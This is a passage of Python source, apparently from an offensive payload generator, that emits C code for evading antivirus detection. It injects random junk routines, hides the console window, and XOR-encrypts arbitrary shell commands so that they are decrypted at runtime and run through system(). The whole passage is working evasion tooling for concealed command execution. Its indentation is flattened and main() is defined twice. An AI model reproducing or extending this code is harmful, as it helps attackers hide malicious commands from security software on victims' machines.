elif random_func == 36:
funccode += fabs_routine_2(H)
elif random_func == 37:
funccode += exp_routine_1(H)
elif random_func == 38:
funccode += exp_routine_2(H)
elif random_func == 39:
funccode += ln_routine_1(H)
elif random_func == 40:
funccode += ln_routine_2(H)
elif random_func == 41:
funccode += log10_routine_1(H)
elif random_func == 42:
funccode += log10_routine_2(H)
elif random_func == 43:
funccode += fmod_routine_1(H)
elif random_func == 44:
funccode += fmod_routine_2(H)
elif random_func == 45:
funccode += ldexp_routine_1(H)
elif random_func == 46:
funccode += ldexp_routine_2(H)
elif random_func == 47:
funccode += geometric_1(H)
elif random_func == 48:
funccode += geometric_2(H)
elif random_func == 49:
funccode += geometric_3(H)
elif random_func == 50:
funccode += geometric_4(H)
elif random_func == 51:
funccode += geometric_5(H)
elif random_func == 52:
funccode += shaker_snort(H)
if method == "code":
code += funccode
else:
evasion_funcname = "void " + core.varname_creator(
) + "(void)\n"
func += evasion_funcname
func += "{\n"
func += funccode
func += "}\n"
funcname += evasion.replace_string(evasion_funcname)
if method == "code":
return code
else:
return funcname, func
else:
if method == "code":
return ""
else:
return "", ""
def main():
hWnd = core.varname_creator()
hw = "int main(int argc, char **argv){\n"
hw += "HWND " + hWnd + " = GetConsoleWindow();\n"
hw += "ShowWindow(" + hWnd + ", SW_HIDE);\n\n"
return hw
def main():
hWnd = core.varname_creator()
hw = "int main(int argc, char * argv[]){"
hw += f"HWND {hWnd} = GetConsoleWindow();"
hw += f"ShowWindow({hWnd}, SW_HIDE);\n"
return hw
def encrypt_exec(commands, junkcode, intensity):
# Decryptor
func_name = core.varname_creator()
arg_command = core.varname_creator()
arg_key = core.varname_creator()
arg_command_lenght = core.varname_creator()
arg_key_lenght = core.varname_creator()
arg_exec = core.varname_creator()
i = core.varname_creator()
func_stub = "void " + func_name + "(int " + arg_command + "[], int " + arg_key + "[], int " + arg_command_lenght + ", int " + arg_key_lenght + ", char " + arg_exec + "[])\n"
func_stub += "{\n"
func_stub += junk.junk_inject(junkcode, "code", intensity)
func_stub += "for(int " + i + " = 0; " + i + "< " + arg_command_lenght + "; " + i + "++)"
func_stub += "{\n"
func_stub += junk.junk_inject(junkcode, "code", intensity)
func_stub += arg_exec + "[" + i + "] = " + arg_command + "[" + i + "] ^ " + arg_key + "[" + i + " % " + arg_key_lenght + "];\n"
func_stub += junk.junk_inject(junkcode, "code", intensity)
func_stub += "}\n"
func_stub += junk.junk_inject(junkcode, "code", intensity)
func_stub += arg_exec + "[" + arg_command_lenght + "] = 0;\n"
func_stub += junk.junk_inject(junkcode, "code", intensity)
func_stub += "}\n"
keylen = randrange(1024, 4096)
key = ''.join(choice(digits) for i in range(keylen))
cmd = list()
for command in commands:
cmd.append(xor_encrypt(command, key))
vKeylen = core.varname_creator()
vKey = core.varname_creator()
vNumcommands = core.varname_creator()
vSizeofcommands = core.varname_creator()
vMaxcommandsize = core.varname_creator()
vCommands = core.varname_creator()
vExeccommands = core.varname_creator()
i = core.varname_creator()
code = "int " + vKeylen + f" = {len(key)};\n"
code += junk.junk_inject(junkcode, "code", intensity)
code += "int " + vKey + f"[] = {{{str([ord(k) for k in key])[1:-1]}}};\n"
code += junk.junk_inject(junkcode, "code", intensity)
code += "int " + vNumcommands + f" = {len(commands)};\n"
code += junk.junk_inject(junkcode, "code", intensity)
code += "int " + vSizeofcommands + f"[] = {{{', '.join([str(len(data)) for data in cmd])}}};\n"
code += junk.junk_inject(junkcode, "code", intensity)
max_length = max([len(data) for data in cmd])
code += "int " + vMaxcommandsize + f" = {max_length};\n"
code += junk.junk_inject(junkcode, "code", intensity)
code += "int " + vCommands + f"[][{max_length}] = {{{', '.join(['{' + str(cmds)[1:-1] + '}' for cmds in cmd])}}};\n"
code += junk.junk_inject(junkcode, "code", intensity)
code += "char " + vExeccommands + "[" + vNumcommands + "][" + vMaxcommandsize + " + 1];\n"
code += junk.junk_inject(junkcode, "code", intensity)
code += "for(int " + i + " = 0; " + i + " < " + vNumcommands + "; " + i + "++)\n"
code += "{\n"
code += junk.junk_inject(junkcode, "code", intensity)
code += func_name + "(" + vCommands + "[" + i + "], " + vKey + ", " + vSizeofcommands + "[" + i + "], " + vKeylen + ", " + vExeccommands + "[" + i + "]);\n"
code += junk.junk_inject(junkcode, "code", intensity)
code += "system(" + vExeccommands + "[" + i + "]);"
code += junk.junk_inject(junkcode, "code", intensity)
code += "}\n"
return func_stub, code
